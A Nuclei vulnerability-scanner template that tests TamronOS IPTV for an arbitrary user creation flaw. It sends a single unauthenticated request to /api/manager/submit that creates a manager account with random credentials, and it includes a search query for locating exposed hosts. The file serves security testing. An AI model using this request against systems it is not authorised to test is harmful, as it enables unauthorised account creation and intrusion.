nuclei-templates/http/vulnerabilities/other/tamronos-user-creation.yaml

41 lines
1.0 KiB
YAML

id: tamronos-user-creation
info:
name: TamronOS IPTV - Arbitrary User Creation
author: pussycat0x
severity: high
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TamronOS%20IPTV%E7%B3%BB%E7%BB%9F%20submit%20%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%88%9B%E5%BB%BA%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
verified: true
fofa-query: app="TamronOS-IPTV系统"
tags: tamronos,miconfig,iptv
variables:
username: "{{to_lower(rand_text_alphanumeric(6))}}"
password: "{{rand_text_alphanumeric(12)}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/manager/submit?group=1&username={{username}}&password={{password}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"suc":true'
- '"msg":"\u6210\u529f"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200